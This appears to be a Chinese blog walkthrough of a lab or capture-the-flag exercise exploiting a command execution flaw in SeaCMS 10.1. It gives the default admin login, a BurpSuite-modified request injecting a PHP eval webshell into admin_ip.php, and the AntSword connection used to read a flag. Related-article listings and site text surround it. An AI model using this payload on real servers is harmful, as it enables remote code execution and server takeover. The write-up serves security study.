命令执行漏洞--seacms 10.1

已于 2023-11-26 14:54:11 修改
阅读量363 收藏 7
点赞数 4
文章标签: web安全 安全
于 2023-11-26 14:47:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62202418/article/details/134621222
版权
本文描述了如何通过利用80端口映射和后台管理系统的漏洞,使用BurpSuite拦截并修改数据包,实现一句话木马的植入,最终获取服务器flag的过程。
摘要由CSDN通过智能技术生成

开启环境

访问80端口的映射端口,进入cms

进入后台http://10.9.47.6:15704/manager/

通过账号密码:admin/admin 进行登录

成功进入后台

找到 系统--后台IP 安全设置

输入IP:127.0.0.1,点击确定,即可提交信息。

此处需要BurpSuite 进行数据包拦截。

机会只有一次(如果失败的话,需要重新启动环境)

开启拦截

拦截到数据包

修改数据包,注入一句话木马

v=0&ip=+127.0.0.1";eval($_REQUEST[777]);//

上数据包提交到服务器,Forward提交

找到上传的数据包,发送到Repeater模块

直接访问文件;

路径为:http://10.9.47.6:15704//manager/admin_ip.php

尝试传参

成功,一句话木马已经传入服务器

中国蚁剑连接

连接成功

在/tmp 文件下找到flag

完成!!

奋斗的马喽
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cudnn-10.1-windows10-x64-v8.0.5.39_zip.rar
06-18
在这个特定的压缩包“cudnn-10.1-windows10-x64-v8.0.5.39”中,我们看到的是针对CUDA 10.1版本、适用于Windows 10操作系统且基于64位架构的CuDNN 8.0.5.39版本。 CuDNN v8.0.5.39是该库的一个重要版本,它提供了...
cudnn-10.1-linux-x64-v8.0.5.39.tgz
06-28
NVIDIA CUDA深度神经网络库 (cuDNN) 是经GPU加速的深度神经网络基元库。cuDNN可大幅优化标准例程(例如用于前向传播和反向传播的卷积层、池化层、归一化层和激活层)的实施。 世界各地的深度学习研究人员和框架...
seacms 远程命令漏洞执行 (CNVD-2020-22721)
xy_wjyjw的博客
10-27 238
点击系统——后台IP安全设置(输入允许 IP:127.0.0.1)打开虚拟终端,输入命令dir /tmp,查看flag。利用漏洞的IP,用蚁剑连接漏洞,连接成功。点击Forward放包,发送到网站。进入bp的网站,并输入url地址。抓包成功,注入一句话密码。填入flag,成功通关。在bp中点击开始抓包。
seacms海洋cms漏洞
YouthBelief的博客
10-29 5765
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
SeaCMS海洋影视管理系统远程代码执行漏洞复现
最新发布
holyxp的博客
07-27 648
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
CVE-2020-21378(seacms后台SQL注入) 分析
RestoreJustice的博客
03-16 1257
变量没有经过什么过滤就直接插入到SQL语句中(360webscan.php会使用正则规则对注册的变量会进行检查,但对$id并没有任何检查),也没有引号包裹,十分好利用。在seacms v10.1版本中,在sql.class.php中GetOne中加入了对SQL语句的安全检查(上面的注入语句这里用不了)绕过方法参考https://xz.aliyun.com/t/2828#toc-3。下面这里的这个检查与先前审计过的duomicms的检查函数一样,是以单引号为界,把第一个引号前的语句给。
seacms_CNVD-2020-22721_v10.1漏洞分析与复现
一个努力学习网安的小牛马
10-27 1104
seacms漏洞复现详情
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026)
weixin_43167326的博客
05-10 583
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!! CVE-2024-26026是BIG-IP Next Central Manager中的SQL注入漏洞。未经身份验证的远程攻击者可以通过向易受攻击的Next Central Manager API端点发送
cudnn-10.1-linux-x64-v7.6.1.34.tgz
12-20
2. 解压:使用tar命令解压下载的tgz文件,例如:`tar -xzvf cudnn-10.1-linux-x64-v7.6.1.34.tgz` 3. 安装头文件:将解压后的`include`目录中的头文件复制到CUDA的include目录下,例如:`sudo cp -P include/* /usr/...
cudnn-10.1-windows10-x64-v7.6.5.32.zip
04-13
标题 "cudnn-10.1-windows10-x64-v7.6.5.32.zip" 指示了这是一个 CUDA Deep Neural Network (cuDNN) 库的压缩包,版本号为 v7.6.5.32,适用于基于 Windows 10 操作系统的 64 位环境,且与 CUDA Toolkit 10.1 版本...
漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1715
seaCms-命令执行】后门代码写入可解析文件中
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 6231
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
seacms admin_ip.php RCE (CVE-2022-48093) 漏洞复现
weixin_68999845的博客
07-31 567
改内容写入的是 .php 文件内的,观察请求的payload是否是恶意的php语句,分析其作用,在本地测试即可(若写入一句话木马,用antswords连接.php文件观察是否成功即可)1.下载源码到本地:https://github.com/seacms-com/seacms。1.登录后台(在配置环境时,后台地址时随机生成的,本次地址为:seacms-master/源码下载url:https://github.com/seacms-com/seacms。以下版本受该漏洞影响:seacms全版本。
WEB 漏洞seacms 远程命令执行(CNVD-2020-22721)
2301_79118231的博客
10-27 559
注:个人笔记,并不全面,仅供参考。
漏洞复现】五、seacms 远程命令执行(CNVD-2020-22721)
weixin_52351575的博客
09-21 499
在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 6069
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
网站漏洞检测 之后台php语句拼接webshell漏洞
网站安全专家
08-24 709
临近9月底,seacms官方升级海洋cms系统到9.95版本,我们SINE安全在对其源码进行网站漏洞检测的时候发现问题,可导致全局变量被覆盖,后台可以存在越权漏洞并绕过后台安全检测直接登录管理员账号。关于该漏洞的具体详情,我们来详细的分析一下: seacms主要设计开发针对于互联网的站长,以及中小企业的一个建站系统,移动互联网的快速发展,该系统可自动适应电脑端,手机端,平板端,APP端等多个用户...
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 3287
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值